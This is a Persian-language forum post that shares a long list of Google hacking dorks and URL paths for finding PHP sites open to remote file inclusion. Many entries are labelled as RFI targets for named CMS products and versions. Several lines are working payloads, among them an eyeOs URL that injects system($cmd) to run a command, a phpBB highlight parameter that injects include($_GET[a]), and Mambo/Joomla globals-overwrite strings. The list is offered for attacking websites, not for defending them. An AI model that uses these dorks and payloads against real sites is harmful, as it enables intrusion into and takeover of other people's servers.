پرش به


تصویر

جدید ترین دورک ها واسه گوگل هکینگ


 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
بدون پاسخ

#1 ارسالی 29 سپتامبر 2017 - 11:44

  OFFLINE
  تاریخ عضویت :
  29 سپتامبر 2017
 • %10█▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 18 ارسال
  Last Visit اكتبر 07 2017 07:39
 • Country :
 • Gender : Male
 • Location : اصفهان
 • Name : HOSSEIN
/index.php?lang=en&cat= .php?lang="
/index.php?lang=en&page= index.php?lang="
/index.php?lang=en&page= .php?lang="
/index.php?lang=en&page= index.php?lang=
index.php?lang=en&page= index.php?lang=
/index.php?lang=en&page= .php?lang=
index.php?lang=en&page= .php?lang=
index.php?lang= "index.php?lang="
index.php?lang= index.php?lang=
index.php?lang=&page= index.php?lang=
index.php?lang=&page= .php?lang=
index.php?lg= "index.php?lg="
index.php?lg= index.php?lg=
index.php?lk= .php?lk="
/index.php?ln= .php?ln=
index.php?lng= "index.php?lng="
index.php?lng= index.php?lng=
index.php?ln= "index.php?ln="
index.php?ln= index.php?ln=
index.php?ln= ".php?ln="
index.php?lnk= index.php?lnk=
index.php?lnk= .php?lnk=
index.php?lnk= "index.php?lnk="
index.php?lnk= ".php?lnk="
index.php?ln= .php?ln=
index.php?loca= index.php?loca=
/index.php?loc= .php?loc="
index.php?loca= .php?loca=
/index.php?loc=&cat= index.php?loc="
/index.php?loc=&cat= .php?loc="
/index.php?loc=&lang= index.php?loc="
/index.php?loc=&lang= .php?loc="
/index.php?loc=&page= index.php?loc="
/index.php?loc= .php?loc=
/index.php?loc=start&page= index.php?loc="
index.php?ltr= index.php?ltr="
index.php?ltr= .php?ltr="
index.php?main= .php?main="
index.php?m= index.php?m="
index.php?meio= index.php?meio="
index.php?meio= index.php?meio=
index.php?meio= .php?meio=
index.php?meio= .php?meio="
index.php?mf= index.php?mf=
index.php?mf= .php?mf=
index.php?mf= .php?mf="
index.php?mid= index.php?mid="
index.php?mid= index.php?mid=
index.php?mid= .php?mid=
index.php?mid= .php?mid="
index.php?middle= index.php?middle="
index.php?middle= index.php?middle=
index.php?middle= .php?middle="
index.php?mn= index.php?mn="
index.php?mn= .php?mn="
index.php?mod= index.php?mod="
index.php?mod= .php?mod="
index.php?new= index.php?new="
index.php?news= index.php?news="
index.php?page1= index.php?page1="
index.php?page1= .php?page1="
index.php?page= php5?page=
index.php?page= index.php?page=
index.php?page=&lang= index.php?p=
index.php?page=&lang= index.php?pag=
index.php?page=&lang= index.php?page=
index.php?page=&lang= index.php?pg=
index.php?page=&lang= .php?p=
index.php?page=&lang= .php?pag=
index.php?page=&lang= .php?page=
index.php?page=&lang= .php?pg=
index.php?pageN= .php?pageN="
index.php?pager= index.php?pager=
index.php?pager= .php?pager=
index.php?pagina= index.php?pagina=
index.php?pag= "index.php?pag="
index.php?pag= index.php?pag=
index.php?p= index.php?p="
index.php?pg= "index.php?pg="
index.php?pg= index.php?pg=
index.php?prod= .php?prod="
index.php?prod= .php?product="
index.php?product= .php?prod="
index.php?product= .php?product="
index.php?r= index.php?r="
index.php?s= index.php?s="
index.php?s= index.php?s=
index.php?s= .php?s=
index.php?s= .php?s="
index.php?secao= index.php?secao=
index.php?secao= .php?secao=
index.php?secao= "index.php?secao="
index.php?secao= ".php?secao="
/index.php?seccion= /index.php?seccion=
/index.php?seccion= .php?seccion=
index.php?sec= "index.php?sec="
index.php?sec= index.php?sec=
/index.php?seite= /index.php?seite=
/index.php?seite= .php?seite=
index.php?select= .php?select="
index.php?select= index.php?select=
index.php?select= .php?select=
index.php?set= index.php?set="
index.php?set= index.php?set=
index.php?set= .php?set=
index.php?set= .php?set="
index.php?sf= index.php?sf="
index.php?show= .php?show="
index.php?s= "index.php?s="
index.php?s= index.php?s=
index.php?sit= index.php?sit="
index.php?sit= .php?sit="
/index.php?slang= /index.php?slang=
/index.php?slang= "index.php?slang="
/index.php?slang= .php?slang=
/index.php?slang= ".php?slang="
index.php?sort= .php?sort="
index.php?spage= index.php?spage="
index.php?spage= index.php?spage=
index.php?spage= .php?spage=
index.php?spage= .php?spage="
index.php?ss= index.php?ss="
index.php?ss= .php?ss="
index.php?st= index.php?st="
index.php?sub= index.php?sub="
index.php?sub= index.php?sub=
index.php?sub= .php?sub=
index.php?sub= "index.php?sub="
index.php?sub= index.php?sub=
index.php?sub= "index.php?sub=""
index.php?sub= "index.php?sub="
index.php?sub= ".php?sub="
index.php?subpage= index.php?subpage="
index.php?subpage= .php?subpage="
index.php?subp= index.php?subp="
index.php?subp= .php?subp="
index.php?table= index.php?table=
index.php?table= .php?table=
index.php?t= index.php?t="
index.php?task= index.php?task=
index.php?task= .php?task=
index.php?term= .php?term="
index.php?textfield= .php?textfield="
index.php?theme= index.php?theme=
index.php?theme= .php?theme=
index.php?theme= .php?theme=
index.php?trans= index.php?trans="
index.php?trans= .php?trans="
index.php?v= index.php?v="
index.php?ver= index.php?ver="
index.php?ver= index.php?ver=
index.php?ver= .php?ver=
index.php?ver= .php?ver="
index.php?ver= .php?ver=
/index.php?vis= /index.php?vis=
/index.php?vis= .php?vis=
index.php?way= index.php?way=
index.php?way= .php?way=
index.php?wpage= index.php?wpage="
index.php?wpage= .php?wpage="
info.php?ln= info.php?ln="
info.php?ln= info.php?ln=
info.php?ln= .php?ln="
/interna.php?meio= .php?meio="
kalender.php?vis= kalender.php"
kalender.php?vis= kalender.php?vis="
kalender.php?vis= .php?vis="
lang.php?arg= .php?arg=
lang.php?arq= .php?arq=
lang.php?lk= .php?lk="
lang.php?ln= .php?ln=
lang.php?subpage= .php?subpage="
lang.php?subp= .php?sub="
lang.php?subp= .php?subp="
/lib/db/ez_sql.php?lib_path= ttCMS
/lib/db/ez_sql.php?lib_path= ttCMS <= v4
/lib/static/header.php?set_menu= iPhoto Album
/lib/static/header.php?set_menu= iPhotoAlbum
/lib/static/header.php?set_menu= iPhotoAlbum v1.1
link.php?do= .php?do="
list.php?product= .php?product=
list.php?table= .php?table=
ln.php?ln= .php?ln=
loc.php?l= .php?l="
loc.php?l= .php?loc="
loc.php?lang= .php?lang="
loc.php?lang= .php?loc="
loc.php?loc= loc.php?loc="
loc.php?loc= .php?loc="
login.php?loca= .php?loca=
magazine.php?inc= .php?inc="
main1.php?arg= .php?arg=
main1.php?ln= .php?ln=
main2.php?ln= .php?ln=
main.html.php?seite= .php?seite=
main.php3?act= main.php3?act="
main.php3?act= .php3?act="
main.php5?page= .php5?id=
main.php?a= .php?a="
main.php?arg= .php?arg=
main.php?ba= main.php?ba="
main.php?ba= .php?ba="
main.php?command= main.php?command="
main.php?command= .php?command="
main.php?d1= main.php?d1="
main.php?d1= .php?d1="
main.php?f1= .php?f1="
main.php?fset= .php?fset="
main.php?inc= .php?inc="
main.php?ln= .php?ln=
main.php?ltr= .php?ltr="
main.php?s= main.php?s="
main.php?s= main.php?s=
main.php?s= .php?s=
main.php?s= .php?s="
main.php?sit= .php?sit="
main.php?table= .php?table=
main.php?vis= main.php?vis="
main.php?vis= main.php?vis=
main.php?vis= .php?vis="
mai.php?act= mai.php?act="
mai.php?act= mai.php?act=
mai.php?loc= mai.php?loc="
mai.php?loc= mai.php?loc=
mai.php?src= mai.php?src="
mai.php?src= mai.php?src=
map.php?loc= map.php?loc=
middle.php?file= "middle.php?file="
middle.php?file= "middle.php?page="
middle.php?file= ".php?file="
middle.php?file= ".php?page="
middle.php?file= middle.php?file=
middle.php?file= middle.php?page=
middle.php?file= .php?file=
middle.php?file= .php?page=
middle.php?page= "middle.php?page="
middle.php?page= ".php?page="
middle.php?page= middle.php?page=
middle.php?page= .php?page=
misc.php?do= .php?do="
mod.php?mod= mod.php?mod="
mod.php?mod= .php?mod="
module.php?mod= module.php?mod="
module.php?mod= .php?mod="
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook"
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook 0.6.1"
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1
modul.php?mod= modul.php?mod="
modul.php?mod= .php?mod="
more.php?sub= "more.php?sub="
more.php?sub= more.php?sub=
nav.php?g= "nav.php?g="
nav.php?g= nav.php?g=
nav.php?go= "nav.php?go="
nav.php?go= nav.php?go=
nav.php?lk= .php?lk="
nav.php?ln= .php?ln=
nav.php?loc= nav.php
nav.php?loc= nav.php?loc=
nav.php?loc= .php?loc=
nav.php?nav= "nav.php?nav="
nav.php?nav= nav.php?nav=
nav.php?page= "nav.php?page="
nav.php?page= nav.php?page=
nav.php?pagina= "nav.php?pagina="
nav.php?pagina= nav.php?pagina=
nav.php?pag= "nav.php?pag="
nav.php?pag= nav.php?pag=
nav.php?pg= "nav.php?pg="
nav.php?pg= nav.php?pg=
nav.php?p= "nav.php?p="
nav.php?p= nav.php?p=
order.php?lang= order.php?lang=
order.php?list= order.php?list=
order.php?ln= order.php?ln=
order.php?l= order.php?l=
order.php?page= order.php?page=
order.php?pag= order.php?pag=
order.php?pg= order.php?pg=
order.php?p= order.php?p=
order.php?wp= order.php?wp=
order.php?wp= .php?wp=
/?page= .php5?id=
page.php5?id= page.php5?id=
page.php5?id= .php5?id=
page.php?arq= .php?arq=
page.php?ln= .php?ln=
page.php?p= page.php?p="
page.php?p= page.php?p=
page.php?p= .php?p=
page.php?p= .php?p="
page.php?s= page.php?s="
page.php?s= page.php?s=
page.php?s= .php?s=
page.php?s= .php?s="
/?pag= .php5?id=
/palportal/index.php?page= /palportal/
/palportal/index.php?page= pal portal
/?pg= .php5?id=
/?p= .php5?id=
p.php?p= .php?p=
p.php?p= .php?p="
p.php?p= p.php?p="
p.php?p= "p.php?p="
p.php?p= p.php?p=
presse.php?do= .php?do="
presse.php?do= presse.php?do="
print.php?pager= .php?pager=
print.php?pager= .php?pager=
print.php?pager= print.php?pager=
print.php?table= .php?table=
proddetail.php?prod= .php?prod="
prod.php?prod= .php?prod="
products.php?prod= .php?prod="
produit.php?prod= .php?prod="
produkt.php?prod= .php?prod="
/read.php?fpage= /read.php?fpage=
reports.php?sub= "reports.php?sub="
reports.php?sub= reports.php?sub=
rss.php?phpraid_dir= phpraid"
rss.php?phpraid_dir= phpraid
rss.php?phpraid_dir= ""$2-"
rss.php?phpraid_dir= "php raid"
rss.php?phpraid_dir= php raid
rss.php?phpraid_dir= phpraid
s1.php?ln= .php?ln=
search.php?exec= search.php?exec=
shop.php?prod= .php?prod="
shop.pl/page= shop.pl/page=
show.php?page1= .php?page1="
show.php?product= .php?product=
show.php?product= show.php?product=
side.php?arq= .php?arq=
side.php?table= .php?table=
side.php?vis= .php?vis=
side.php?vis= side.php?vis=
site.php?arq= .php?arq=
site.php?meio= .php?meio=
site.php?table= .php?table=
s.php?table= .php?table=
start.php?id= .php?id="
start.php?id= start.php?id="
start.php?id= start.php?id=
start.php?lang= .php?lang="
start.php?lang= start.php?lang="
start.php?lang= start.php?lang=
start.php?lang= .php?lang=
start.php?lang= start.php?lang=
start.php?mod= .php?mod="
start.php?mod= start.php?mod="
start.php?page= .php?page="
start.php?page= start.php?page="
start.php?page= start.php?page=
start.php?pag= start.php?pag=
start.php?pg= start.php?pg=
start.php?p= start.php?p=
start.php?s= .php?s="
start.php?s= start.php?s="
start.php?s= start.php?s=
start.php?s= start.php?s=
str.php?lang= str.php?lang=
str.php?ln= str.php?ln=
str.php?l= str.php?l=
str.php?page= str.php?page=
str.php?p= str.php?p=
sub.php?menu= "sub.php?menu="
sub.php?menu= sub.php?menu=
sub.php?s= "sub.php?s="
sub.php?s= sub.php?s=
sub.php?sub= "sub.php?sub="
sub.php?sub= sub.php?sub=
task.php?task= .php?task=
task.php?task= task.php?task=
/templates/mangobery/footer.sample.php?Site_Path= Mangobery
/templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5
/templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5
trans.php?trans= .php?trans="
trans.php?trans= trans.php?trans="
/trans/trans.php?trans=eng&page= .php?trans="
/trans/trans.php?trans=en&page= .php?trans="
/trans/trans.php?trans=fr&page= .php?trans="
/trans/trans.php?trans=ko&page= .php?trans="
/trans/trans.php?trans=&page= .php?trans="
/trans/trans.php?trans=&p= .php?trans="
view.php?sub= "view.php?sub="
view.php?sub= view.php?sub=
view.php?table= .php?table=
voir.php?inc= .php?inc="
werbungFrame.php?do= .php?do="
/ws/get_events.php?includedir= Web Calendar
/ws/get_events.php?includedir= WebCalendar
/ws/get_events.php?includedir= WebCalendar v0.9.45
/ws/get_reminders.php?includedir= WebCalendar
/ws/get_reminders.php?includedir= WebCalendar v0.9.45
/ws/login.php?includedir= WebCalendar
/ws/login.php?includedir= WebCalendar v0.9.45
ocp-103/index.php?req_path= ocPortal
images/evil.php?owned= e107
/modules/My_eGery/public/displayCategory.php?basepath=
/include/new-visitor.inc.php?lvc_include_dir=
/_functions.php?prefix=
/cpcommerce/_functions.php?prefix=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/eblog/blog.inc.php?xoopsConfig[xoops_url]=
/pm/lib.inc.php?pm_path=
/b2-tools/gm-2-b2.php?b2inc=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/agendax/addevent.inc.php?agendax_path=
/includes/include_once.php?include_file=
/e107/e107_handlers/secure_img_render.php?p=
/shoutbox/expanded.php?conf=
/main.php?x=
/myPHPCalendar/admin.php?cal_dir=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/includes/include_onde.php?include_file=
/index.php?page=
/index.php?pg=
/index.php?show=
/db.php?path_local=
/index.php?site=
/htmltonuke.php?filnavn=
/livehelp/inc/pipe.php?HCL_path=
/hcl/inc/pipe.php?HCL_path=
/inc/pipe.php?HCL_path=
/support/faq/inc/pipe.php?HCL_path=
/help/faq/inc/pipe.php?HCL_path=
/helpcenter/inc/pipe.php?HCL_path=
/live-support/inc/pipe.php?HCL_path=
/gnu3/index.php?doc=
/gnu/index.php?doc=
/phpgwapi/setup/tables_update.inc.php?appdir=
/forum/inst.php?phpbb_root_dir=
/includes/calendar.php?phpc_root_path=
/includes/setup.php?phpc_root_path=
/inc/authform.inc.php?path_pre=
/include/authform.inc.php?path_pre=
index.php?sec=
index.php?filename=
index.php?dir=
index.php?document=
index.php?view=
*.php?sel=
*.php?session=&content=
*.php?locate=
*.php?place=
*.php?layout=
*.php?go=
*.php?catch=
*.php?mode=
*.php?name=
*.php?loc=
*.php?f=
*.php?inf=
*.php?pg=
*.php?load=
*.php?naam=
/index.php?page= site:*.dk
/index.php?file= site:*.dk
INURL OR INURL WITH:
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/pivot/modules/module_db.php?pivot_path=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/mylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/mylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/modules/xgery/upgrade_album.php?GERY_BASEDIR=
/library/editor/editor.php?root=
/library/lib.php?root=
/zentrack/index.php?configFile=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/es/index.php?action=
/index.php?main=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/content.php?page=
/main_site.php?page=
/index.php?L2=
/main.php?page=
/tutorials/print.php?page=
/index.php?inter_url=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index.php?babInstPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
1. my_egery site:.org
2. xgery site:.org
3. coppermine site:.org
4. 4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
5. inurlP:NphpBB2 site:.org
6. ihm.php?p=
7. Keyword : "powered by MyLinks"
8. /modules.php?name=myguests
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
9. /Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=
10. google = kietu/hit_js.php, kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=
11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=
12. keyword : "powered by CubeCart 3.0.6"
13. keyword : "powered by paBugs 2.0 Beta 3"
14. powered by AshNews", AshNews atau/ashnews.php
15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
16. ihm.php?p=*
14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
15. .php?bodyfile=
16. /includes/orderSuccess.inc.php?glob=
17. forums.html
/modules.php?name=
18. /default.php?page=home
19. /folder.php?id=
20. main.php?pagina=
/paginedinamiche/main.php?pagina=
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( *.edu.*/modules.php?name=myguests ) or ( "powered by MyGuests")
22. application.php?base_path=
/application.php?base_path=
23. inurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=
24. inurlp:hpnuke
25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=
26. keyword: "powered by smartblog" AND ?page=login
27. /forum/
/forum/admin/index.php?inc_conf=
28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=
29. shoutbox/expanded.php filetypep:hp
30./osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=
31. keyword : "Powered by iUser"
/common.php?include_path=
32."static.php?load="
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
34. keyworld: /phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=
35. /folder.php?id=
/classes.php?LOCAL_PATH=
"/lire.php?rub="
"/os/pointer.php?url="
"folder.php?id="
"show.php?page="
"index2.php?DoAction="
"index.php?canal="
"index.php?screen="
"index.php?langc="
"index.php?Language="
"view.php?page="
dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=
dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=
dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=
"template.php?goto="
"video.php?content="
"pages.php?page="
"index1.php?choix="
"index1.php?menu="
"index2.php?ascii_seite="
dork: surveys
rfi to this dork: /surveys/survey.inc.php?path=
"index.php?body="
dork: adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=
dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=
"kb_constants.php?module_root_path="
dork: mcf.php"
rfi to this dork: /mcf.php?content=
dork: "main.php?sayfa="
rfi to this dork: /main.php?sayfa=
dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=
dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
login.php?dir=
"index.php?go="
"index1.php?="
"lib/gore.php?libpath="
"index2.php?p="
/classes/adodbt/sql.php?classes_dir=
/classified_right.php?language_dir=
/sources/template.php?CONFIG[main_path]=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/mcf.php?content=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=
impex/ImpExData.php?systempath=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
/login.php?dir=
/tags.php?BBCodeFile=
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=
index1.php?=
main.php?id=
lib/gore.php?libpath=
news_detail.php?file=
old_reports.php?file=
index.php?nic=
homepage.php?sel=
index.php?sel=
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
main.php?pagina=
test.php?page=
index.php?lang=
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
index.php?mode=
index.php?stranica=
index.php?sub=
index.php?t=
solpot.html?body=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
index.php?u=
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
show_news.php?cutepath=
page.php?doc=
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
components/com_geria/geria.html.php?mosConfig_absolute_path=
/functions.php?include_path=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/include/write.php?dir=
db.php?path_local=
index.php?file=
index.php?content=
index.php?kobr=
index.php?l=
index.php?a=
index.php?opcao=
index.php?conteudo=
index.php?meio=
index.php?inc=
index.php?c=
index.php?arquivo=
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
index.php?show=
index.php?dept=
index.php?inhalt=
principal.php?conteudo=
main.php?site=
template.php?name=
forum.php?act=
index2.php?content=
index.phpmain.php?x=
index.php?canal=
services.php?page=
index.php?Language=
video.php?content=
pages.php?page=
print.php?page=
show.php?page=
media.php?page=
index2.php?ascii_seite=
index2.php?DoAction=
index1.php?site=
main.php?link=
home.php?x=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/squito/photolist.inc.php?photoroot=
/spid/lang/lang.php?lang_path=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep=
/jscript.php?my_ms[root]=
/popup_window.php?site_isp_root=
/surveys/survey.inc.php?path=
index.php?body=
enc/content.php?Home_Path=
/sources/functions.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/includes/kb_constants.php?module_root_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/main.php?sayfa=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/addpost_newpoll.php?addpoll=preview&thispath=
/header.php?abspath=
/modules/vwar/admin/admin.php?vwar_root=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
login.php?dir=
index.php?pageurl=
index.php?id=
content.php?page=
admin.php?page=
SQuery/lib/gore.php?libpath=
index2.php?p=
config.php?_CCFG[_PKG_PATH_DBSE]=
akocomments.php?mosConfig_absolute_path=
index.php?lang=gr&file
index.php?pag=
index.php?incl=
avatar.php?page=
index.php?x= index.php?mode=index.php?stranica=
index.php?sub=index.php?id=index.php?t=
index.php?menu=
index0.php?show=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=
index.php?topic=
index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=
/modules/vwar/admin/admin.php?vwar_root=index.php?loc=
.br/index.php?loc=
myevent.php?myevent_path=
includes/functions.php?phpbb_root_path=
index.php?template=
search.php?cutepath=
administrator/components/com_webring/admin.webring.docs.php?component_dir=
help.php?css_path=
big.php?pathtotemplate=
includes/search.php?GlobalSettings[templatesDirectory]=
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=
modules/My_eGery/index.php?basepath=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
/class.mysql.php?path_to_bt_dir=
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/squirrelcart/cart_content.php?cart_isp_root=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
index.php?url=
index.php?openfile=
index.php?side=
index.php?doc=
index.php?principal=
index.php?rage=
index.php?place=
index.php?dsp=
index.php?lg=
index.php?pilih=
template.php?pagina=
contenido.php?sec=
index_principal.php?pagina=
home.php?pagina=
noticias.php?arq=
default.php?page=
index.php?meio.php=
index.php?screen=
index.php?langc=
htmltonuke.php?filnavn=
ihm.php?p=
folder.php?id=
index.php?Load=
h.php?file=
h.php?page=
template.php?goto=
index1.php?menu=
index.php?ort=
index2.php?ID=
index2.php?url_page=
index1.php?dat=
port.php?content=
index1.php?x=
/contrib/yabbse/poc.php?poc_root_path=
/photoalb/lib/static/header.php?set_menu=
/bz/squito/photolist.inc.php?photoroot=
/ppa/inc/functions.inc.php?config[ppa_root_path]=
al_initialize.php?alpath=
/extensions/moblog/moblog_lib.php?basedir=
modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
/components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
inc/cmses/aedating4CMS.php?dir[inc]=
bp_ncom.php?bnrep=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/yabbse/Sources/Packages.php?sourcedir=
/include/main.php?config[search_disp]=true&include_dir=
/includes/functions_portal.php?phpbb_root_path=
pagina.php?ir=
home.php?qry=
index3.php?url=
index1.php?action=
press.php?param=
view.php?adresa=
pagina.php?type=
file.php?ki=
gery.php?seite=
include.php?loader=
index2.php?module=
gery.php?strona=
general.php?itemnav=
template.php?h=
nota.php?header=
blank.php?ki=
enter.php?base_dir=
general.php?thispage=
view.php?var=
include.php?*
layout.php?pagina=
padrao.php?ir=
*inc*.php?left=
gery.php?eval=
index2.php?base_dir=
index1.php?op=
padrao.php?sivu=
enter.php?pagina=
principal.php?recipe=
file.php?pref=
standard.php?goto=
index2.php?phpbb_root_path=
path.php?action=
mod*.php?link=
include.php?nivel=
head.php?pollname=
default.php?name=
standard.php?param=
general.php?where=
head.php?*
principal.php?url=
home.php?ref=
down*.php?left=
standard.php?url=
press.php?*root*=
view.php?*
view.php?second=
include.php?loc=
template.php?second=
index.php?filepath=
home.php?pr=
index.php?module=
file.php?url=
home.php?itemnav=
default.php?read=
view.php?incl=
down*.php?to=
principal.php?viewpage=
index2.php?choix=
standard.php?seccion=
page.php?goto=
*.php?secc=
index3.php?chapter=
start.php?seccion=
base.php?middlePart=
template.php?panel=
path.php?menue=
padrao.php?secc=
*inc*.php?inc=
general.php?id=
standard.php?pref=
template.php?play=
layout.php?my=
padrao.php?seite=
press.php?i=
mod*.php?tipo=
gery.php?ref=
press.php?inc=
index2.php?left=
view.php?phpbb_root_path=
base.php?k=
index3.php?pag=
down*.php?OpenPage=
sitio.php?strona=
nota.php?seite=
index.php?basepath=
info.php?in=
start.php?where=
default.php?n=
down*.php?filepath=
main.php?corpo=
principal.php?filepath=
view.php?option=
show.php?*root*=
principal.php?pre=
start.php?p=
standard.php?home=
enter.php?numero=
index2.php?oldal=
general.php?addr=
general.php?tipo=
index.php?secao=
info.php?op=
template.php?page=
include.php?sivu=
index.php?modo=
show.php?module=
sitio.php?texto=
gery.php?oldal=
press.php?incl=
principal.php?w=
index2.php?pname=
path.php?path=
*inc*.php?category=
default.php?pag=
default.php?pr=
main.php?adresa=
default.php?to=
default.php?opcion=
main.php?str=
path.php?in=
base.php?ev=
principal.php?choix=
default.php?m=
include.php?name=
path.php?link=
view.php?pag=
principal.php?my=
index1.php?*
path.php?header=
*inc*.php?base_dir=
principal.php?basepath=
view.php?disp=
head.php?modo=
show.php?left=
gery.php?url=
sub*.php?*root*=
mod*.php?section=
general.php?name=
base.php?disp=
